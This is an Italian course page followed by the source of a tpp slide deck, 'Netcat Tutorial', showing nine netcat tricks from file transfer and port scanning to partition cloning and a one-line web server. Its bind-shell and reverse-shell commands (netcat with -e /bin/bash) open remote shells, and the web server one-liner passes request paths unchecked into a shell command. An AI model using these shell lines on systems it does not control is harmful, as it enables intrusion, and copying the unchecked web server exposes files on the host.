Nell'esercitazione del 13/11, abbiamo visto due temi d'esame. Qui trovate i file relativi:
(usate tpp per visualizzarle)
--author Giovanni Agosta --title Netcat Tutorial --date today An introduction to Netcat, the TCP/IP Swiss Army Knife --newpage intro --heading What is Netcat? * Basically, Netcat opens a TCP (or UDP) connection to a given set of address and port * The connection then functions as a pipe in both senses - Anything sent to stdin is copied to the stdout of the other machine * Thus, it serves a purpose similar to pipes, but allows processes on different machines to be composed * And now, 9 quick & dirty tricks with Netcat! --newpage cat --heading 1 Chat & File Transfer receiver: --beginoutput nc -l -p <#port> --endoutput transmitter: --beginoutput nc localhost <#port> nc <#address> <#port> --endoutput * Use redirection of stdin/stdout to perform file transfer * Use -q to force termination after end of input or a given time * Communication is bidirectional --newpage socket --heading 2 Handling Information Requests You can make up a simple server to make information available on a given port: --beginoutput while true ; do cat /proc/loadavg | nc -l p <#port> -q 1 > logfile.log ; done --endoutput * This script returns the current content of the loadavg file from procfs to any request * It can be used to implement a quick and dirty version of process B from the exam of March 9, 2006 --newpage filter --heading 3 Filter Network Traffic Redirecting a streams on a given port through filters and finally to the actual server, which has been set to listen to a different port. --beginoutput mkfifo back nc -l -p <#expectedport> 0<back | <infilter> | nc localhost <#actualport> | <outfilter> >back --endoutput * Use a fifo to handle backward dataflow * Use a couple of netcat server and client to redirect traffic * Use any program or script to filter incoming and outcoming data --newpage scanning --heading 4 Port Scanning Finding open ports and associated servers at a given address --beginoutput nc -v -z -w 1 <#address> <#port>-<#port> --endoutput * Scans all ports in a range at the given address * Uses no input or output (-z) * Drops the connection after 1 second * Prints out the active ports (using the verbose option) --newpage telnet --heading 5 Telnet On the local machine --beginoutput nc <#address> <#port> --endoutput On the remote machine --beginoutput nc -l <#port> -e /bin/bash --endoutput * You obtain a shell into the remote machine --newpage reverse --heading 6 Reverse Telnet On the local machine --beginoutput nc -l -vv <#port> --endoutput On the remote machine --beginoutput nc -vv <#address> <#port> -e /bin/bash --endoutput * You obtain a shell into the remote machine * Use cryptcat (netcat + blowfish) for such uses! --newpage partition --heading 7 Partition Cloning over the Network Copying an entire partition to a different machine: --beginoutput dd if=/dev/<#partition> | netcat <#address> <#port> netcat -l -p <#port> | dd of=/dev/<#partition> --endoutput * Uses dd to read and write to/from the partition * Both partitions should be unmounted --newpage search --heading 8 Search Engine Querying Querying the Google search engine: --beginoutput echo -e "GET /search?q=Mystara HTTP/1.1\nUser-agent: Mozilla\n\n" | netcat google.com 80 | sed -e 's/\(<a href[^<>]*>\)/\n\1\n/g' | grep href=\"http | grep -v google | grep -v cache | sed -e 's/<a href=\"\([^\"]*\)\"[^>]*>/\1/g' --endoutput Let's have a look at the individual filters --newpage search2 --heading Search Engine Querying --beginoutput echo -e "GET /search?q=Mystara HTTP/1.1\nUser-agent: Mozilla\n\n" --endoutput * Build the query string as HTTP GET, specifying a valid (although ultimately fake) agent to avoid error messages such as "frames not supported" * Output the query to stdout --beginoutput netcat google.com 80 --endoutput * Redirect stdin to google.com at port 80 * At the same time, redirect response from google.com to stdout --newpage search3 --heading Search Engine Querying --beginoutput sed -e 's/\(<a href[^<>]*>\)/\n\1\n/g' sed -e 's/<a href=\"\([^\"]*\)\"[^>]*>/\1/g' --endoutput * sed is a stream editor, runs as a filter * -e executes the following string as a sed script * s/<pattern>/<replacement>/g replaces every instance of the pattern within the input stream with the replacement string * \1 is a positional reference to the part of the pattern within \( \) --newpage search4 --heading Search Engine Querying * Google's html comes without line breaks * The first sed filter puts each hyperlink on its own line * Now we can grep for lines that contain an hyperlink --beginoutput grep href=\"http | grep -v google | grep -v cache --endoutput * But not an internal hyperlink (either cache or links to other Google services) --newpage webserver --heading 9 A Web Server --beginoutput mkfifo p ; mkfifo f ; cat f > p & while true ; do nc -v -q 2 -l -p 8080 0<p | \ grep -m1 GET | \ sed -e 's/GET \/\([^ ]*\) HTTP[/0-9.]*/cat \/var\/www\/html\/\1 >f /ep ; q' \ 2>webserver.log ; done --endoutput --newpage conclusion --heading Conclusion --boldon --center Like its namesake, netcat has (at least) 9 lives ;) --boldoff /\_/\ Examples from: / 0 0 \ Few Useful Netcat Tricks (1-7) ====v==== the OpenBSD netcat documentation (8) \ W / and yours truly (9) | | _ / ___ \ / / / \ \ | (((-----)))-' / ( ___ \__.=|___E (ascii art from http://nc.sourceforge.net) /